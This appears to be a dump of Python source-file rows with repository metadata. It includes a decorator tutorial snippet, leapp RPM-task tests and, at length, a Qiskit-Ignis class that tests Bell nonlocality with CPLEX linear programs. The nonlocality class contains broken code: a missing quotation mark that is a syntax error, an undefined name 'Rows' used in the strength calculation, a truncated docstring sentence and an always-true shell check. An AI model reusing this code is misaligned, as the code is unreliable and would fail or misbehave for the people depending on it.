id=__ret__.id,
issuer_mode=__ret__.issuer_mode,
issuer_url=__ret__.issuer_url,
jwks_binding=__ret__.jwks_binding,
jwks_url=__ret__.jwks_url,
max_clock_skew=__ret__.max_clock_skew,
name=__ret__.name,
protocol_type=__ret__.protocol_type,
scopes=__ret__.scopes,
token_binding=__ret__.token_binding,
token_url=__ret__.token_url,
type=__ret__.type,
user_info_binding=__ret__.user_info_binding,
user_info_url=__ret__.user_info_url)
| 4,612 | 23 | 75 |
78649f653658eb525ecfda8006945a0bc03fb895 | 430 | py | Python | python_practice/python_tricks/chp3/decorator/example_5-1.py | sokunmin/deep_learning_practices | 49e1a08adbfcd2054adb1c08236d57405fad14d3 | [
"Apache-2.0"
] | null | null | null | python_practice/python_tricks/chp3/decorator/example_5-1.py | sokunmin/deep_learning_practices | 49e1a08adbfcd2054adb1c08236d57405fad14d3 | [
"Apache-2.0"
] | null | null | null | python_practice/python_tricks/chp3/decorator/example_5-1.py | sokunmin/deep_learning_practices | 49e1a08adbfcd2054adb1c08236d57405fad14d3 | [
"Apache-2.0"
] | null | null | null |
# ----------------- Debuggable Decorators ----------------- #
# [1] metadata attached to original function is hidden
def greet():
"""return a friendly greeting. """
return 'Hi, there!'
print(greet.__name__)
print(greet.__doc__)
decorated_greet = uppercase(greet)
print(decorated_greet.__name__)
print(decorated_greet.__doc__)
| 19.545455 | 61 | 0.651163 |
# ----------------- Debuggable Decorators ----------------- #
def uppercase(func):
def wrapper():
return func().upper()
return wrapper
# [1] metadata attached to original function is hidden
def greet():
"""return a friendly greeting. """
return 'Hi, there!'
print(greet.__name__)
print(greet.__doc__)
decorated_greet = uppercase(greet)
print(decorated_greet.__name__)
print(decorated_greet.__doc__)
| 67 | 0 | 22 |
34146f89f88df887ca2126f16ca343ed46b8ebce | 37,694 | py | Python | qiskit/ignis/verification/nonlocality/bell_nonlocality.py | anndero/qiskit-ignis | 7e4619dfdcb00e5c601e035083c6ea709b23b075 | [
"Apache-2.0"
] | null | null | null | qiskit/ignis/verification/nonlocality/bell_nonlocality.py | anndero/qiskit-ignis | 7e4619dfdcb00e5c601e035083c6ea709b23b075 | [
"Apache-2.0"
] | null | null | null | qiskit/ignis/verification/nonlocality/bell_nonlocality.py | anndero/qiskit-ignis | 7e4619dfdcb00e5c601e035083c6ea709b23b075 | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
# This code is part of Qiskit.
#
# (C) Copyright IBM 2020.
#
# This code is licensed under the Apache License, Version 2.0. You may
# obtain a copy of this license in the LICENSE.txt file in the root directory
# of this source tree or at http://www.apache.org/licenses/LICENSE-2.0.
#
# Any modifications or derivative works of this code must retain this
# copyright notice, and modified files need to carry a notice indicating
# that they have been altered from the originals.
""" Bell nonlocality testing class."""
import qiskit
import cplex
import itertools
import functools
import collections
import numpy as np
from math import ceil
try:
from matplotlib import pyplot as plt
PLT = True
except ImportError:
PLT = False
try:
shell = get_ipython().__class__.__name__
if shell == 'ZMQInteractiveShell' or "google.colab._shell":
from tqdm import tqdm_notebook as tqdm
else:
from tqdm import tqdm as tqdm
except NameError:
from tqdm import tqdm as tqdm
from qiskit.ignis.verification.nonlocality.bell_scenario import BellScenario
from typing import Optional, Sequence, Union, List, Dict
NumType = Union[int, float, complex]
StateType = Union[qiskit.quantum_info.states.DensityMatrix,
qiskit.quantum_info.states.Statevector,
np.ndarray, List[List[NumType]]]
GateType = Union[qiskit.circuit.Gate, qiskit.quantum_info.Operator,
List[List[NumType]], np.ndarray]
| 44.714116 | 119 | 0.532048 | # -*- coding: utf-8 -*-
# This code is part of Qiskit.
#
# (C) Copyright IBM 2020.
#
# This code is licensed under the Apache License, Version 2.0. You may
# obtain a copy of this license in the LICENSE.txt file in the root directory
# of this source tree or at http://www.apache.org/licenses/LICENSE-2.0.
#
# Any modifications or derivative works of this code must retain this
# copyright notice, and modified files need to carry a notice indicating
# that they have been altered from the originals.
""" Bell nonlocality testing class."""
import qiskit
import cplex
import itertools
import functools
import collections
import numpy as np
from math import ceil
try:
from matplotlib import pyplot as plt
PLT = True
except ImportError:
PLT = False
try:
shell = get_ipython().__class__.__name__
if shell == 'ZMQInteractiveShell' or "google.colab._shell":
from tqdm import tqdm_notebook as tqdm
else:
from tqdm import tqdm as tqdm
except NameError:
from tqdm import tqdm as tqdm
from qiskit.ignis.verification.nonlocality.bell_scenario import BellScenario
from typing import Optional, Sequence, Union, List, Dict
NumType = Union[int, float, complex]
StateType = Union[qiskit.quantum_info.states.DensityMatrix,
qiskit.quantum_info.states.Statevector,
np.ndarray, List[List[NumType]]]
GateType = Union[qiskit.circuit.Gate, qiskit.quantum_info.Operator,
List[List[NumType]], np.ndarray]
class BLocFitter(BellScenario):
#-----------------------------------------------------------------------------------------------
def __init__(self,
sett: Sequence[int],
results: Optional[List[qiskit.result.Result]] = None,
state: Optional[StateType] = None,
pre_meas_gates: Optional[List[List[GateType]]] = None):
""" Initialize BLocFitter with attributes.
Assumes that results come from qiskit circuits built of state preparation part and
measurements preceded by pre_meas_gates.
Providing state and pre_meas_gates is necessary to calculate theorethical tests.
Structure of pre_meas_gates should reflect the settings scenario with sublists of available
1-qubit gates or matrices for a respective subsystem. For example:
>>> pre_meas_gates = [[XGate,YGate,ZGate],[RXGate(pi/3),RYGate(pi/6)]]
indicates 2 subsystems with 3 and 2 options respectively.
Args:
sett (Sequence[int]): possible measurement settings per subsystem. len(sett) is the
number of subsystems.
results (List[Result]): qiskit circuit results in order due to the increasing input
indices.
state (Statevector or DensityMatrix or matrix or vector): a quantum state.
pre_meas_gates (List[List[Gate or Operator or unitary matrix]]): lists of grouped
unitary gates preceding the measurements.
"""
super().__init__(sett=sett, d=2)
self._meas_qcorr = []
self._calc_qcorr = {}
self._results = []
if results is not None:
self.add_results(results)
self._rho = None
if state is not None:
self.rho = state
self._gates = None
if pre_meas_gates is not None:
self.pre_meas_gates = pre_meas_gates
self._LP = None
# qiskit results --> measured quantum correlations
#-----------------------------------------------------------------------------------------------
@property
def results(self) -> List[List[qiskit.result.Result]]:
""" Return a list of all added qiskit experiment results.
Returns:
List[List[Result]]: qiskit experiment results."""
return self._results
def add_results(self, results: List[List[qiskit.result.Result]], clear: bool = False):
""" Add list of qiskit results to self.results. Calculate measured quantum correlations
and update self.meas_qcorr.
Args:
results (List[Result]): qiskit circuits results in order due to the increasing input
indices.
clear (bool): if True then clear all previously added results, otherwise all results
are taken into account [Default: False].
Raises:
TypeError: if elements of results list are not qiskit Results.
ValueError: if results are incompatible with setting scenario or if all results
doesn't have the same number of shots.
"""
if not all(isinstance(r, qiskit.result.Result) for r in results):
raise TypeError("Results should be a list of qiskit Result objects.")
if len(results) != np.prod(self.s):
raise qiskit.QiskitError(
"Results should be a list of length {}".format(np.prod(self.s)))
if len(set([r.results[0].shots for r in results])) != 1:
raise qiskit.QiskitError(
"Number of shots in all results in the list should be the same.")
if clear:
self._results = []
self._results.append(results)
self.calc_meas_qcorr()
def calc_meas_qcorr(self) -> None:
""" Calculate measured quantum correlations and set self.meas_qcorr."""
total_counts = np.zeros(self.rows_a)
shots = 0
for results in self._results:
shots += results[0].results[0].shots
counts = []
for res in results:
counts.extend([v for k, v in sorted(res.get_counts().items())])
total_counts += np.array(counts)
self._meas_qcorr = total_counts/shots
# density matrix of quantum state
#-----------------------------------------------------------------------------------------------
@property
def rho(self) -> np.ndarray:
""" Return the density matrix of a quantum state.
The setter validates if an arg is a valid quantum state."""
return self._rho
@rho.setter
def rho(self, state: StateType):
if not isinstance(state, qiskit.quantum_info.states.DensityMatrix):
state = qiskit.quantum_info.states.DensityMatrix(state)
if (state.is_valid() and len(state.dims()) == self.n and len(set(state.dims())) == 1):
self._rho = state.data
self._d = state.dims()[0]
else:
raise qiskit.QiskitError("Invalid state.")
# unitary matrices of pre measurement gates
#-----------------------------------------------------------------------------------------------
@property
def pre_meas_gates(self) -> List[List[np.ndarray]]:
""" Return the lists of the established unitary gates preceding the measurements.
Returns:
List[List[np.ndarray]]: unitary matrices."""
return self._gates
@pre_meas_gates.setter
def pre_meas_gates(self, gates: List[List[GateType]]):
if (len(gates) != self.n or any(len(gates[i]) != self.s[i] for i in range(self.n))):
raise qiskit.QiskitError(
"pre_meas_gates are incompatible with the settings scenario.")
self._gates = [[self.__check_single_gate(i) for i in j] for j in gates]
self._calc_qcorr.clear()
def __check_single_gate(self, gate: GateType) -> np.ndarray:
if hasattr(gate, 'to_matrix'):
gate = gate.to_matrix()
elif hasattr(gate, 'to_operator'):
gate = gate.to_operator().data
gate = np.array(gate, dtype=complex)
if not qiskit.quantum_info.operators.predicates.is_unitary_matrix(gate):
raise qiskit.QiskitError("Matrix is not unitary.")
if gate.shape[0]!= self.d:
raise qiskit.QiskitError("Matrix is incompatible with self.d.")
return gate
# quantum correlations
#-----------------------------------------------------------------------------------------------
def get_quantum_corr(self, source: str, row: int) -> np.float:
""" Return quantum correlation for inputs and outputs of a given row.
Args:
source (str): source of quantum correlations:
'meas': probabilities from qiskit experiment results.
'calc': probabilities calculated according to Born rule.
row (int): an index of a constraint in an optimization problem.
Returns:
np.float: quantum probability.
"""
if source.lower() == 'meas':
if self.meas_qcorr is not None:
return self._meas_qcorr[self._check_int(row)]
else:
raise qiskit.QiskitError(
"To return measured quantum correlations please add qiskit results.")
elif source.lower() == 'calc':
return self._calc_qcorr.setdefault(row,self.quantum_prob(row))
else:
raise qiskit.QiskitError(
"Invalid source of quantum correlations. Should be 'meas' or 'calc'.")
@property
def meas_qcorr(self) -> List[float]:
""" Return a list of the measured quantum correlations with indices corresponding to the
LP rows.
The setter validates if the sum of correlations is correct."""
return self._meas_qcorr
@meas_qcorr.setter
def meas_qcorr(self, corr: List[float]):
if not np.isclose(sum(corr),np.prod(self.s)):
raise qiskit.QiskitError('Invalid sum of correlations.')
self._meas_qcorr = corr
@property
def calc_qcorr(self) -> Dict[int, float]:
""" Return a dict mapping row indices to the calculated quantum correlations.
The setter validates the type of argument."""
return self._calc_qcorr
@calc_qcorr.setter
def calc_qcorr(self, corr: Dict[int, np.float]):
if not isinstance(corr,dict):
raise qiskit.QiskitError(
"corr should be a dict mapping rows to the corresponding quantum probabilities.")
self._calc_qcorr = corr
def quantum_prob(self, row: int) -> np.float:
""" Return quantum probability according to Born rule."""
if self.pre_meas_gates is None or self.rho is None:
raise qiskit.QiskitError(
"To calculate quantum probability, please provide rho and pre_meas_gates.")
m = self.inputs(row)
rid = int(float(row))%(self.d**self.n)
U = functools.reduce(np.kron, [np.linalg.inv( self.pre_meas_gates[i][j] )
for i, j in enumerate(m)])
p = 0*1j
for l in range(self.d**self.n):
for k in range(self.d**self.n):
p += U[k][rid].conjugate() * self.rho[k][l] * U[l][rid]
return np.real(p)
# linear programming
#-----------------------------------------------------------------------------------------------
@property
def LP(self) -> cplex.Cplex:
""" Return the cplex LP model."""
return self._LP
def new_LP(self, LP_type: str) -> None:
""" Build new cplex LP model and set it to self.LP.
Args:
LP_type (str): type of an optimization problem, can be either 'feasibility'
or 'optimization'.
"""
self._LP = cplex.Cplex()
# set objective
if LP_type.lower() == 'feasibility':
self.LP.variables.add(ub = np.ones(self.cols),
lb = np.zeros(self.cols))
elif LP_type.lower() in ['optimization','optimisation']:
self.LP.variables.add(obj = np.hstack((np.zeros(self.cols),[1.0])),
ub = np.ones(self.cols+1),
lb = np.zeros(self.cols+1))
else:
raise qiskit.QiskitError(
"Invalid LP_type. Should be either 'feasibility' or "
"'optimization'. Objective hasn't been set.")
self.LP.objective.set_sense(self.LP.objective.sense.maximize)
# summation constraint
self.LP.linear_constraints.add(
lin_expr = [cplex.SparsePair(ind = range(self.cols),
val = np.ones(self.cols))],
rhs = [1.0], senses = 'E', range_values = [0.0], names = ['sum'])
# restrict output
self.LP.set_log_stream(None)
self.LP.set_error_stream(None)
self.LP.set_warning_stream(None)
self.LP.set_results_stream(None)
# solving method
alg = self.LP.parameters.lpmethod.values
self.LP.parameters.lpmethod.set(alg.dual)
self.LP.parameters.threads.set(3)
self.LP.parameters.parallel.set(1)
def populate_LP(self, LP_type: str, source: str, rows: Sequence[int]) -> None:
""" Adds constraints to cplex LP model.
Args:
LP_type (str): type of an optimization problem, can be either 'feasibility'
or 'optimization'.
source (str): source of quantum correlations, can be either 'meas' or 'calc'.
rows (Sequence[int]): indices of constrains in the LP problem.
"""
if isinstance(rows, str):
raise TypeError(
"String sequence can be ambiguous in multisetting scenario.")
if not hasattr(rows, '__iter__'):
rows = [self._check_int(rows)]
if LP_type.lower() == 'feasibility':
self.LP.linear_constraints.add(
lin_expr=[cplex.SparsePair(
ind=self.get_local_corr(row),
val=np.ones(len(self.local_corr.get(row)))) for row in rows],
rhs=[self.get_quantum_corr(source, row) for row in rows],
senses=np.full(len(rows),'E'), range_values=np.zeros(len(rows)))
elif LP_type.lower() in ['optimization', 'optimisation']:
self.LP.linear_constraints.add(
lin_expr=[cplex.SparsePair(
ind=self.get_local_corr(row) + [self.cols],
val=[1.0]*len(self.local_corr[row]) + [self.d**(-self.n)
- self.get_quantum_corr(source, row)]) for row in rows],
rhs=np.full(len(rows), self.d**(-self.n)),
senses=np.full(len(rows),'E'), range_values=np.zeros(len(rows)))
else:
raise qiskit.QiskitError(
"Invalid LP_type. Should be either 'feasibility' or 'optimization'. "
"Constraints hasn't been set.")
# handler
#-----------------------------------------------------------------------------------------------
def __handle_args(self, source, rows, nosignaling, min_size, max_size, step):
if not isinstance(source,str) or source.lower() not in ['meas','calc']:
raise ValueError("Source should be either 'meas' or 'calc'.")
if not isinstance(nosignaling,(bool,np.bool_)):
raise TypeError("nosignaling should be True or False.")
if rows is None:
rows = list(range(self.rows_a))
elif isinstance(rows, str):
raise TypeError(
"String sequence can be ambiguous in multisetting scenario.")
elif not hasattr(rows, '__iter__'):
rows = [self._check_int(rows)]
else:
rows = list(set(rows)) # remove duplicates
if max_size is None: # solve the full LP at the end
max_size = min(self.rows_b, len(rows)) if nosignaling else len(rows)
else:
max_size = self._check_int(max_size)
subset = []
if min_size is None: # solve the LP without iteration
min_size = max_size
elif hasattr(min_size,'__iter__'): # start from custom initial subset
if isinstance(min_size, str):
raise TypeError(
"String sequence can be ambiguous in multisetting scenario.")
subset = list(set(min_size.copy())) # remove duplicates
min_size = len(subset)
else:
min_size = self._check_int(min_size)
if not (1 <= min_size <= max_size <= len(rows)):
raise ValueError("Invalid iterative bounds on subset size.")
if step is None:
step = ceil(len(rows)/100)
else:
self._check_int(step)
if not (1 <= step <= max_size):
raise ValueError("Iterative step is out of range.")
return (rows, min_size, max_size, step, subset)
#-----------------------------------------------------------------------------------------------
def nonlocality_test(self,
source: str = 'meas',
rows: Optional[Sequence[int]] = None,
nosignaling: bool = False,
min_size: Optional[Union[int, Sequence[int]]] = None,
max_size: Optional[int] = None,
step: Optional[int] = None,
progressbar: bool = False):
""" Test Bell nonlocality.
According to Bell theorem the correlations of some entangled states can't be described
by local realistic models. This method checks the feasibility of a classical model by
nonlocality was detected
Args:
source (str): source of quantum correlations. [Default: 'meas']
'meas': probabilities from qiskit backend results.
'calc': probabilities calculated according to Born rule.
rows (Sequence[int]): indices of constraints taken into account in solving LP.
If None then takes all constraints. [Default: None]
nosignaling: (bool): if True then only nonredundand rows according to default
nosignaling rule are passed to LP. [Default: False]
min_size (int or list[int]): initial number of constraints in iterative solving.
If None then solves only LP with max_size of constraints without iteration.
If given as sequence then starts iteration from custom initial subset of constraints.
[Default: None]
max_size (int): maximal number of constraints in iterative solving.
If None then in final step solves the full LP with all rows. [Default: None]
step (int): the increase in size of subset of constraints in iterative solving.
If None then ceil(1% of all constraints). [Default: None]
progressbar (bool): show tqdm progressbar if True. [Default: False]
Returns:
bool: True if Bell nonlocality was detected, which is possible only for some entangled
quantum states. False if quantum correlations can be reproduced classically within
Local Hidden Variables (LHV) model.
"""
(rows, min_size, max_size, step, subset) = self.__handle_args(
source=source, rows=rows, nosignaling=nosignaling,
min_size=min_size, max_size=max_size, step=step)
self.new_LP('feasibility')
subset_size = len(subset)
if subset_size > 0:
for row in subset:
rows.remove(row)
self.populate_LP('feasibility', source, subset)
if progressbar:
pbar = tqdm(initial=0, total=max_size)
for size in itertools.chain(range(min_size, max_size, step), [max_size]):
new_rows = []
if not nosignaling:
for new in range(size - subset_size):
new_rows.append(rows.pop(np.random.randint(len(rows))))
else:
while len(new_rows) < size - subset_size and rows:
new = rows.pop(np.random.randint(len(rows)))
if self.get_nonredundant(new): new_rows.append(new)
if new_rows:
subset_size += len(new_rows)
self.populate_LP('feasibility', source, new_rows)
self.LP.solve()
status = self.LP.solution.get_status_string()
NL = True if status=='infeasible' else (
False if status=='optimal' else status)
if progressbar:
pbar.update(subset_size - pbar.n)
pbar.set_description_str(desc=str(NL), refresh=True)
if NL or not rows:
break
return NL
#-----------------------------------------------------------------------------------------------
def nonlocality_strength(self,
source: str = 'meas',
rows: Optional[Sequence[int]] = None,
nosignaling: bool = False,
min_size: Optional[Union[int, Sequence[int]]] = None,
max_size: Optional[int] = None,
step: Optional[int] = None,
progressbar: bool = False,
plot: bool = False):
""" Calculate Bell nonlocality strength:
The nonlocality strength is understood as resistance to noise and defined as the amount of
white noise admixture required to completely suppress the nonclassical character of the
original quantum correlations. The calculation of strength is based on visibility parameter
:math:`v` in: :math:`\rho(v)= v\rho +(1-v)\rho_{white noise}`. This method involves solving
an optimization problem (LP) in which the visibility is maximized until the set of linear
constraints can no longer be satisfied. That returns a critical visibility parameter, while
:math: `nonlocality strength = 1 - critical visibility`.
Args:
source (str): source of quantum correlations. [Default: 'meas']
'meas': probabilities from qiskit backend results.
'calc': probabilities calculated according to Born rule.
rows (list[int]): indices of constraints taken into account in
solving LP. If None then takes all constraints. [Default: None]
nosignaling: (bool): if True then only nonredundand rows according
to default nosignaling rule are passed to LP. [Default: False]
min_size (int or list[int]): initial number of constraints in
iterative solving. If None then solves only LP with max_size
of constraints without iteration. If given as sequence then
starts iteration from custom initial subset of constraints.
[Default: None]
max_size (int): maximal number of constraints in iterative solving.
If None then in final step solves the full LP with all rows.
[Default: None]
step (int): the increase in size of subset of constraints
in iterative solving. If None then ceil(1% of all constraints).
[Default: None]
progressbar (bool): show tqdm progressbar if True. [Default: False]
plot (bool): if True then plot nonlocality strength convergence vs
the size of constraints set. [Default: False]
Returns:
np.float: the nonlocality strength.
"""
(rows, min_size, max_size, step, subset) = self.__handle_args(
source=source, rows=rows, nosignaling=nosignaling,
min_size=min_size, max_size=max_size, step=step)
self.new_LP('optimization')
subset_size = len(subset)
if subset_size > 0:
for row in subset:
Rows.remove(row)
self.populate_LP('optimization', source, subset)
strength_dict={}
prec_dict = {}
if progressbar:
pbar = tqdm(initial = 0, total = max_size)
for size in itertools.chain(range(min_size, max_size, step), [max_size]):
new_rows = []
if not nosignaling:
for new in range(size - subset_size):
new_rows.append(Rows.pop(np.random.randint(len(rows))))
else:
while len(new_rows) < size - subset_size and rows:
new = rows.pop(np.random.randint(len(rows)))
if self.get_nonredundant(new):
new_rows.append(new)
if new_rows:
subset_size += len(new_rows)
self.populate_LP('optimization', source, new_rows)
self.LP.solve()
cv = self.LP.solution.get_objective_value()
prec = self.LP.solution.get_float_quality(
self.LP.solution.quality_metric.max_primal_infeasibility)
strength_dict[size] = 1 - cv
prec_dict[size] = prec
if progressbar:
pbar.update(size - pbar.n)
pbar.set_description_str(desc=str([1-cv, prec]), refresh=True)
if not rows:
break
if plot:
fig, ax = plt.subplots(1,figsize=(12,8))
for item in ([ax.title,ax.xaxis.label,ax.yaxis.label] +
ax.get_xticklabels() + ax.get_yticklabels()):
item.set_fontsize(14)
size = sorted(strength_dict.keys())
STRENGTH = np.array([strength_dict[key] for key in size])
PREC = np.array([prec_dict[key] for key in size])
ax.plot(size, STRENGTH, lw=1, color='blue', marker='.')
ax.fill_between(size, STRENGTH+PREC, STRENGTH-PREC, facecolor='blue', alpha=0.3)
ax.set_xlabel('subset size')
ax.set_ylabel('critical visibility')
ax.grid()
ticks = plt.yticks()
if (ticks[0][1]-STRENGTH[-1]) < (ticks[0][-1]-STRENGTH[-1])/40:
i = 1
else:
i = 0
ticks[0][i] = STRENGTH[-1]
plt.yticks(ticks[0][i:-1])
fig.tight_layout()
return [1 - cv, prec]
#-----------------------------------------------------------------------------------------------
def nonlocality_sub_test(self,
source: str = 'meas',
rows: Optional[Sequence[int]] = None,
nosignaling: bool = False,
min_size: Optional[int] = None,
max_size: Optional[int] = None,
step: Optional[int] = None,
runs: int = 1,
progressbar: bool = False,
plot: bool = False):
""" Subsampling row constraints in testing Bell nonlocality :
Args:
source (str): source of quantum correlations. [Default: 'meas']
'meas': probabilities from qiskit backend results.
'calc': probabilities calculated according to Born rule.
rows (list[int]): indices of constraints taken into account in solving LP.
If None then takes all constraints. [Default: None]
nosignaling: (bool): if True then only nonredundand rows according to default
nosignaling rule are passed to LP. [Default: False]
min_size (int or list[int]): initial number of constraints in iterative solving.
If None then solves only LP with max_size of constraints without iteration.
If given as sequence then starts iteration from custom initial subset of
constraints. [Default: None]
max_size (int): maximal number of constraints in iterative solving.
If None then in final step solves the full LP with all rows.[Default: None]
step (int): the increase in size of subset of constraints in iterative solving.
if None then ceil(1% of all constraints).[Default: None]
runs (int): the number of repetitions of a single step, each time with new random
subset of constraints.
progressbar (bool): show tqdm progressbar if True. [Default: False]
plot (bool): show plot of nonlocality strength vs size of constraints subset.
[Default: False]
"""
(rows, min_size, max_size, step, subset) = self.__handle_args(
source=source, rows=rows, nosignaling=nosignaling,
min_size=min_size, max_size=max_size, step=step)
NL = {}
if progressbar:
pbar = tqdm(initial=0, total=max_size, desc='size')
for size in itertools.chain(range(min_size, max_size, step), [max_size]):
if nosignaling and len(rows) < size:
print("Not enough nonredundant rows for subset of size: {}".format(size))
break
nl = collections.defaultdict(int)
if progressbar:
Runs = tqdm(range(runs), desc='runs', leave=False)
else:
Runs = range(runs)
for run in Runs:
if not nosignaling:
subset = np.random.choice(rows, size, replace=False)
else:
Rows = rows.copy()
lenR = len(Rows)
subset = []
while len(subset) < size and lenR > 0:
new = Rows.pop(np.random.randint(lenR))
if self.get_nonredundant(new):
subset.append(new)
else:
rows.remove(new)
lenR -= 1
if len(subset) < size:
break
self.new_LP('feasibility')
self.populate_LP('feasibility',source,subset)
self.LP.solve()
status = self.LP.solution.status[self.LP.solution.get_status()]
if status=='infeasible':
nl[True] += 1
elif status=='optimal':
nl[False] += 1
else:
nl[status] += 1
NL[size] = dict(nl)
if progressbar :
pbar.update(size - pbar.n)
pbar.set_description_str(refresh=True)
if plot:
fig, ax = plt.subplots(1,figsize=(12,8))
for item in ([ax.title,ax.xaxis.label,ax.yaxis.label]
+ ax.get_xticklabels() + ax.get_yticklabels()):
item.set_fontsize(14)
ax.plot(sorted(NL.keys()),[NL[k].get(True,0)/sum(NL[k].values())
for k in sorted(NL.keys())],lw=1,marker='.')
ax.set_title('Bell nonlocality test with subsampling',fontsize=18)
ax.set_xlabel('subset size')
ax.set_ylabel('success rate of nonlocality detection')
ax.grid()
fig.tight_layout()
return
#-----------------------------------------------------------------------------------------------
def nonlocality_sub_strength(self,
source: str = 'meas',
rows: Optional[Sequence[int]] = None,
nosignaling: bool = False,
min_size: Optional[int] = None,
max_size: Optional[int] = None,
step: Optional[int] = None,
runs: int = 1,
progressbar: bool = False,
plot: bool = False):
""" Subsampling constraints in nonlocality strength calculations :
Args:
source (str): source of quantum correlations. [Default: 'meas']
'meas': probabilities from qiskit backend results.
'calc': probabilities calculated according to Born rule.
rows (list[int]): indices of constraints taken into account in solving LP.
If None then takes all constraints. [Default: None]
nosignaling: (bool): if True then only nonredundand rows according to default
nosignaling rule are passed to LP. [Default: False]
min_size (int or list[int]): initial number of constraints in iterative solving.
If None then solves only LP with max_size of constraints without iteration.
If given as sequence then starts iteration from custom initial subset of
constraints. [Default: None]
max_size (int): maximal number of constraints in iterative solving.
If None then in final step solves the full LP with all rows.[Default: None]
step (int): the increase in size of subset of constraints in iterative solving.
if None then ceil(1% of all constraints).[Default: None]
runs (int): the number of repetitions of a single step, each time with new random
subset of constraints.
progressbar (bool): show tqdm progressbar if True. [Default: False]
plot (bool): show plot of nonlocality strength vs size of constraints subset.
[Default: False]
"""
(rows, min_size, max_size, step, subset) = self.__handle_args(
source=source, rows=rows, nosignaling=nosignaling,
min_size=min_size, max_size=max_size, step=step)
STRENGTHstat = {}
if progressbar:
pbar = tqdm(initial=0, total=max_size, desc='size')
for size in itertools.chain(range(min_size, max_size, step), [max_size]):
if nosignaling and len(rows) < size:
print("Not enough nonredundant rows for subset of size: {}".format(size))
break
STRENGTH = []
if progressbar:
Runs = tqdm(range(runs), desc='runs', leave=False)
else:
Runs = range(runs)
for run in Runs:
if not nosignaling:
subset = np.random.choice(rows, size, replace=False)
else:
Rows = rows.copy()
lenR = len(Rows)
subset = []
while len(subset) < size and lenR > 0:
new = Rows.pop(np.random.randint(lenR))
if self.get_nonredundant(new):
subset.append(new)
else:
rows.remove(new)
lenR -= 1
if len(subset) < size:
break
self.new_LP('optimization')
self.populate_LP('optimization',source,subset)
self.LP.solve()
cv = self.LP.solution.get_objective_value()
STRENGTH.append(1 - cv)
STRENGTHstat[size] = {'mean':np.mean(STRENGTH),'stddev':np.std(STRENGTH),
stat':len(STRENGTH)}
if progressbar:
pbar.update(size - pbar.n)
pbar.set_description_str(refresh=True)
if plot:
fig, ax = plt.subplots(1,figsize=(12,8))
for item in ([ax.title,ax.xaxis.label,ax.yaxis.label]
+ ax.get_xticklabels() + ax.get_yticklabels()):
item.set_fontsize(14)
STRENGTHmean = np.array([STRENGTHstat[k]['mean'] for k in STRENGTHstat])
STRENGTHstd = np.array([STRENGTHstat[k]['stddev'] for k in STRENGTHstat])
ax.plot(STRENGTHstat.keys(), STRENGTHmean, lw=1, color='blue', marker='.')
ax.fill_between(STRENGTHstat.keys(), STRENGTHmean+STRENGTHstd,
STRENGTHmean-STRENGTHstd, facecolor='blue', alpha=0.3)
ax.set_xlabel('subset size')
ax.set_ylabel('critical visibility')
ax.grid()
ticks = plt.yticks()
if (ticks[0][1] - STRENGTHmean[-1]) < (ticks[0][-1] - STRENGTHmean[-1])/20:
i = 1
else:
i = 0
ticks[0][i] = STRENGTHmean[-1]
plt.yticks(ticks[0][i:-1])
fig.tight_layout()
return fig.tight_layout()
| 3,598 | 32,580 | 24 |
965c347bd3b26e1f4421f05b0bae79f27969df24 | 1,491 | py | Python | repos/system_upgrade/common/actors/rpmtransactionconfigtaskscollector/tests/test_load_tasks_rpmtransactionconfigtaskscollector.py | sm00th/leapp-repository | 1c171ec3a5f9260a3c6f84a9b15cad78a875ac61 | [
"Apache-2.0"
] | 21 | 2018-11-20T15:58:39.000Z | 2022-03-15T19:57:24.000Z | repos/system_upgrade/common/actors/rpmtransactionconfigtaskscollector/tests/test_load_tasks_rpmtransactionconfigtaskscollector.py | sm00th/leapp-repository | 1c171ec3a5f9260a3c6f84a9b15cad78a875ac61 | [
"Apache-2.0"
] | 732 | 2018-11-21T18:33:26.000Z | 2022-03-31T16:16:24.000Z | repos/system_upgrade/common/actors/rpmtransactionconfigtaskscollector/tests/test_load_tasks_rpmtransactionconfigtaskscollector.py | sm00th/leapp-repository | 1c171ec3a5f9260a3c6f84a9b15cad78a875ac61 | [
"Apache-2.0"
] | 85 | 2018-11-20T17:55:00.000Z | 2022-03-29T09:40:31.000Z | import logging
from leapp.libraries.actor.rpmtransactionconfigtaskscollector import load_tasks, load_tasks_file
from leapp.libraries.stdlib import api
from leapp.models import RPM, InstalledRedHatSignedRPM
RH_PACKAGER = 'Red Hat, Inc. <http://bugzilla.redhat.com/bugzilla>'
| 39.236842 | 106 | 0.657277 | import logging
from leapp.libraries.actor.rpmtransactionconfigtaskscollector import load_tasks, load_tasks_file
from leapp.libraries.stdlib import api
from leapp.models import RPM, InstalledRedHatSignedRPM
RH_PACKAGER = 'Red Hat, Inc. <http://bugzilla.redhat.com/bugzilla>'
def test_load_tasks(tmpdir, monkeypatch):
def consume_signed_rpms_mocked(*models):
installed = [
RPM(name='c', version='0.1', release='1.sm01', epoch='1', packager=RH_PACKAGER, arch='noarch',
pgpsig='RSA/SHA256, Mon 01 Jan 1970 00:00:00 AM -03, Key ID 199e2f91fd431d51')
]
yield InstalledRedHatSignedRPM(items=installed)
monkeypatch.setattr(api, "consume", consume_signed_rpms_mocked)
tmpdir.join('to_install').write('a\n b\n c \n\n\nc\na\nc\nb')
tmpdir.join('to_keep').write('a\n b\n c \n\n\nc\na\nc\nb')
tmpdir.join('to_remove').write('a\n b\n c \n\n\nc\na\nc\nb')
m = load_tasks(tmpdir.strpath, logging)
# c is not going to be in "to_install" as it is already installed
assert set(m.to_install) == set(['a', 'b'])
assert set(m.to_keep) == set(['a', 'b', 'c'])
assert set(m.to_remove) == set(['a', 'b', 'c'])
def test_load_tasks_file(tmpdir):
f = tmpdir.join('to_install')
f.write('a\n b\n c \n\n\nc\na\nc\nb')
assert set(load_tasks_file(f.strpath, logging)) == set(['a', 'b', 'c'])
f = tmpdir.join('to_keep')
f.write(' ')
assert set(load_tasks_file(f.strpath, logging)) == set([])
| 1,167 | 0 | 46 |
9dce34501665a0ef27501cf8445600e0b82ee8e7 | 819 | py | Python | ingenialink/utils/errors.py | ingeniamc/ingenialink-python | 6011931697e48456f5638c2848303aac2e5bcb75 | [
"MIT"
] | 15 | 2017-08-30T13:43:14.000Z | 2022-03-29T07:04:30.000Z | ingenialink/utils/errors.py | ingeniamc/ingenialink-python | 6011931697e48456f5638c2848303aac2e5bcb75 | [
"MIT"
] | 11 | 2017-08-28T11:23:18.000Z | 2022-03-28T23:48:11.000Z | ingenialink/utils/errors.py | ingeniamc/ingenialink-python | 6011931697e48456f5638c2848303aac2e5bcb75 | [
"MIT"
